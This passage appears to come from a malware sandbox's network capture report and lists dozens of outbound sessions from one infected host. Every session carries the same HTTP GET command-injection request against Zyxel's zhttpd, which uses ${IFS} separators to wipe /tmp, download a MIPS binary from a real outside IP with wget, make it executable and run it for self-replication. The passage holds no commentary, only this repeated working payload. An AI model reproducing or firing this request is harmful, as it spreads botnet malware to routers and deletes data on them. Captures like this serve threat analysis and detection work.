                              Mar 31, 2024 08:41:26.855228901 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4540192.168.2.1346598104.203.126.77443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:26.855295897 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4541192.168.2.1360664149.104.154.49443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:27.862056017 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4542192.168.2.133646832.210.12.181443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:27.862087011 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4543192.168.2.134002018.167.8.222443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:27.862145901 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4544192.168.2.134459840.83.184.72443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:27.862175941 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4545192.168.2.134894062.177.92.46443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:27.862179041 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4546192.168.2.135908267.133.35.237443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:27.862235069 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4547192.168.2.1338600112.128.30.6443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:27.862262964 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4548192.168.2.1337588126.58.56.110443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:27.862291098 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4549192.168.2.134423642.210.243.15443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:27.862348080 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4550192.168.2.1334834218.181.250.8443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:27.862355947 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4551192.168.2.133633283.233.80.122443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:27.862437010 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4552192.168.2.1354992168.37.32.238443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:27.862467051 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4553192.168.2.1347178207.241.243.65443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:27.862509966 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4554192.168.2.1355278103.244.134.106443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:27.862560034 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4555192.168.2.1356116223.65.44.30443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:27.862610102 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4556192.168.2.134828864.119.234.192443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:27.862647057 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4557192.168.2.133710061.206.158.19443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:27.862731934 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4558192.168.2.1337608159.66.126.213443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:27.862801075 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4559192.168.2.1335888121.89.60.153443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:27.862859964 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4560192.168.2.1356886220.66.103.6443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:27.862911940 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4561192.168.2.133981438.38.55.244443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:27.862922907 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4562192.168.2.1348312217.197.172.222443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:27.862950087 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4563192.168.2.135557042.31.237.116443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:27.863006115 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4564192.168.2.133768823.227.182.23443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:27.863038063 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4565192.168.2.1334418187.15.7.186443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:27.863066912 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4566192.168.2.1336884102.95.194.228443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:27.863080978 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4567192.168.2.1358332192.48.219.32443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:27.863147020 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4568192.168.2.134420050.211.221.66443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:27.863198996 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4569192.168.2.133448078.195.205.141443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:27.863226891 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4570192.168.2.133835065.3.169.228443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:27.863260984 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4571192.168.2.134978885.221.204.155443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:27.863291979 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4572192.168.2.136073645.42.216.9443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:27.863323927 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4573192.168.2.135887073.48.236.125443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:27.863364935 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4574192.168.2.134619839.194.33.114443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:27.863388062 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4575192.168.2.135955266.27.151.7443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:27.863899946 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4576192.168.2.135705065.7.88.112443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:27.863971949 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4577192.168.2.1337622184.190.179.108443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:27.864036083 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4578192.168.2.1335168176.131.244.119443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:27.864207983 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4579192.168.2.133561672.254.111.57443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.875581026 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4580192.168.2.1346770147.199.140.35443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.875607014 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4581192.168.2.1342166200.16.166.159443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.875657082 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4582192.168.2.1340236156.94.88.32443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.875714064 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4583192.168.2.134785466.182.125.107443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.875756025 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4584192.168.2.135079251.173.24.120443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.875782013 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4585192.168.2.1347250207.130.46.191443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.875848055 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4586192.168.2.135245432.249.17.131443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.875873089 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4587192.168.2.1335808126.158.50.179443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.875915051 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4588192.168.2.1335946110.99.195.202443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.875967026 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4589192.168.2.1344120181.195.100.204443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.875993967 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4590192.168.2.133581289.254.175.213443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.876034975 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4591192.168.2.1351606137.246.124.199443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.876070023 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4592192.168.2.1342856189.155.173.110443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.876116991 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4593192.168.2.1359920116.189.18.152443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.876156092 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4594192.168.2.1353364122.10.52.181443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.876208067 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4595192.168.2.135452634.232.41.173443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.876245975 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4596192.168.2.1339848210.109.42.149443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.876297951 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4597192.168.2.135225649.131.123.56443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.876328945 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4598192.168.2.1355716187.205.204.7443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.876365900 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4599192.168.2.134380288.115.221.26443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.876421928 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4600192.168.2.133739032.193.136.235443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.876472950 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4601192.168.2.1352394196.51.149.156443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.876529932 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4602192.168.2.133897412.159.144.234443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.876565933 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4603192.168.2.1351666207.178.64.103443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.876607895 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4604192.168.2.135128617.177.75.84443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.876642942 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4605192.168.2.1345196198.17.190.89443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.876702070 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4606192.168.2.1351430159.180.186.83443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.876733065 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4607192.168.2.1351664193.48.245.50443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:28.876769066 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4608192.168.2.1358234118.171.234.108443
                              TimestampBytes transferredDirectionData
